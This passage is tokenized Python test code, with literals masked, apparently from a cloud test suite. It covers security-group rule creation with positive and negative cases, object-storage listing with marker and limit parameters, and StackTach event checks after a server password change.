'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:255> } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . 
append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:2> } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { "<STR_LIT>" : '<STR_LIT>' , "<STR_LIT>" : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative = DatasetList ( ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . 
append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , "<STR_LIT>" : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . 
append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' ] ) <EOL> @ DataDrivenFixture <EOL> class SecurityGroupRuleCreateTest ( NetworkingSecurityGroupsFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> super ( SecurityGroupRuleCreateTest , cls ) . setUpClass ( ) <EOL> cls . expected_secgroup = cls . get_expected_secgroup_data ( ) <EOL> cls . expected_secgroup . name = '<STR_LIT>' <EOL> cls . expected_secgroup . description = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . secgroup = self . create_test_secgroup ( self . expected_secgroup ) <EOL> self . expected_secrule = self . get_expected_secrule_data ( ) <EOL> self . expected_secrule . security_group_id = self . secgroup . id <EOL> def tearDown ( self ) : <EOL> self . 
secGroupCleanUp ( ) <EOL> @ data_driven_test ( data_set_list ) <EOL> def ddtest_security_group_rule_create ( self , <EOL> security_group_id = None , <EOL> direction = None , <EOL> ethertype = None , <EOL> port_range_min = None , <EOL> port_range_max = None , <EOL> protocol = None , <EOL> remote_group_id = None , <EOL> remote_ip_prefix = None , <EOL> use_false_values = False ) : <EOL> """<STR_LIT>""" <EOL> expected_secrule = self . expected_secrule <EOL> request_kwargs = dict ( <EOL> security_group_id = expected_secrule . security_group_id ) <EOL> properties = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for prop_name in properties : <EOL> prop_value = eval ( prop_name ) <EOL> if prop_value is not None : <EOL> request_kwargs [ prop_name ] = prop_value <EOL> setattr ( expected_secrule , prop_name , prop_value ) <EOL> if protocol is not None : <EOL> request_kwargs [ '<STR_LIT>' ] = protocol <EOL> expected_secrule . protocol = protocol . upper ( ) <EOL> if remote_group_id is not None : <EOL> if remote_group_id == True : <EOL> remote_group_id = expected_secrule . security_group_id <EOL> request_kwargs [ '<STR_LIT>' ] = remote_group_id <EOL> expected_secrule . remote_group_id = remote_group_id <EOL> resp = self . sec . behaviors . create_security_group_rule ( ** request_kwargs ) <EOL> if resp . response . entity and hasattr ( resp . response . entity , '<STR_LIT:id>' ) : <EOL> self . delete_secgroups_rules . append ( resp . response . entity . id ) <EOL> self . assertFalse ( resp . failures ) <EOL> secrule = resp . response . entity <EOL> self . 
assertSecurityGroupRuleResponse ( expected_secrule , secrule ) <EOL> @ data_driven_test ( data_set_list_negative ) <EOL> def ddtest_security_group_rule_create_negative ( self , <EOL> security_group_id = None , <EOL> direction = None , <EOL> ethertype = None , <EOL> port_range_min = None , <EOL> port_range_max = None , <EOL> protocol = None , <EOL> remote_group_id = None , <EOL> remote_ip_prefix = None , <EOL> use_false_values = False , <EOL> http_status = None , <EOL> test_desc = None , <EOL> error_type = None ) : <EOL> """<STR_LIT>""" <EOL> expected_secrule_data = self . expected_secrule <EOL> request_kwargs = dict ( <EOL> security_group_id = expected_secrule_data . security_group_id , <EOL> raise_exception = False ) <EOL> properties = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for prop_name in properties : <EOL> prop_value = eval ( prop_name ) <EOL> if prop_value is not None : <EOL> request_kwargs [ prop_name ] = prop_value <EOL> if use_false_values : <EOL> request_kwargs [ '<STR_LIT>' ] = protocol <EOL> resp = self . sec . behaviors . create_security_group_rule ( ** request_kwargs ) <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( test_description = test_desc ) <EOL> status_code = getattr ( SecurityGroupsResponseCodes , http_status ) <EOL> if error_type : <EOL> error_type = getattr ( SecurityGroupsErrorTypes , error_type ) <EOL> self . assertNegativeResponse ( <EOL> resp = resp , status_code = status_code , msg = msg , <EOL> delete_list = self . delete_secgroups_rules , <EOL> error_type = error_type ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from cloudcafe . objectstorage . objectstorage_api . common . constants import Constants <EOL> from cloudroast . objectstorage . fixtures import ObjectStorageFixture <EOL> CONTENT_TYPE_TEXT = '<STR_LIT>' <EOL> CONTAINER_NAME = '<STR_LIT>' <EOL> class MarkerEndMarkerTest ( ObjectStorageFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( MarkerEndMarkerTest , cls ) . setUpClass ( ) <EOL> cls . container_name = CONTAINER_NAME <EOL> cls . client . create_container ( cls . container_name ) <EOL> object_data = Constants . VALID_OBJECT_DATA <EOL> content_length = str ( len ( object_data ) ) <EOL> headers = { '<STR_LIT>' : content_length , <EOL> '<STR_LIT:Content-Type>' : CONTENT_TYPE_TEXT } <EOL> cls . obj_names = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> for obj_name in cls . obj_names : <EOL> cls . client . create_object ( <EOL> cls . container_name , <EOL> obj_name , <EOL> headers = headers , <EOL> data = object_data ) <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> super ( MarkerEndMarkerTest , cls ) . setUpClass ( ) <EOL> cls . behaviors . force_delete_containers ( [ cls . container_name ] ) <EOL> def test_marker ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:c>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:5> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . 
format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> def test_marker_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . obj_names ) ) <EOL> def test_marker_swapped_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . 
format ( <EOL> expected , <EOL> recieved ) ) <EOL> def test_end_marker ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:d>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:2> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> def test_end_marker_upper_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . 
obj_names ) ) <EOL> def test_end_marker_swapped_uppper_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> def test_marker_end_marker ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:b>" , "<STR_LIT>" : "<STR_LIT:e>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:3> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( '<STR_LIT>' , members , msg = "<STR_LIT>" ) <EOL> def test_marker_end_marker_lower_upper_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . 
loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . obj_names ) ) <EOL> def test_marker_end_marker_swapped_upper_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> def test_marker_limit ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:b>" , "<STR_LIT>" : "<STR_LIT:2>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . 
ok ) <EOL> expected = <NUM_LIT:2> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> def test_marker_limit_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . obj_names ) ) <EOL> def test_marker_limit_swapped_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . 
format ( <EOL> expected , <EOL> recieved ) ) <EOL> def test_end_marker_limit ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:e>" , "<STR_LIT>" : "<STR_LIT:2>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:2> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> def test_end_marker_limit_upper_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . 
obj_names ) ) <EOL> def test_end_marker_limit_swapped_upper_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> def test_marker_end_marker_limit ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:b>" , <EOL> "<STR_LIT>" : "<STR_LIT:e>" , <EOL> "<STR_LIT>" : "<STR_LIT:2>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:2> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> def test_marker_end_marker_limit_upper_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , <EOL> "<STR_LIT>" : "<STR_LIT:h>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . 
container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . obj_names ) ) <EOL> def test_marker_end_marker_limit_swapped_upper_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , <EOL> "<STR_LIT>" : "<STR_LIT:a>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) </s>
<s> """<STR_LIT>""" <EOL> from cloudroast . stacktach . fixtures import StackTachComputeIntegration , StackTachTestAssertionsFixture <EOL> class StackTachDBChangePasswordServerTests ( StackTachComputeIntegration , <EOL> StackTachTestAssertionsFixture ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . create_server ( ) <EOL> cls . change_password_server ( ) <EOL> cls . stacktach_events_for_server ( server = cls . changed_password_server ) <EOL> def test_launch_entry_on_change_password_server_response ( self ) : <EOL> """<STR_LIT>""" <EOL> self . validate_attributes_in_launch_response ( ) <EOL> def test_launch_entry_fields_on_change_password_server_response ( self ) : <EOL> """<STR_LIT>""" <EOL> self . validate_launch_entry_field_values ( <EOL> server = self . changed_password_server ) <EOL> def test_no_delete_entry_on_change_password_server_response ( self ) : <EOL> """<STR_LIT>""" <EOL> self . validate_no_deletes_entry_returned ( ) <EOL> def test_no_exist_entry_on_change_password_server_response ( self ) : <EOL> """<STR_LIT>""" <EOL> self . validate_no_exists_entry_returned ( ) </s>
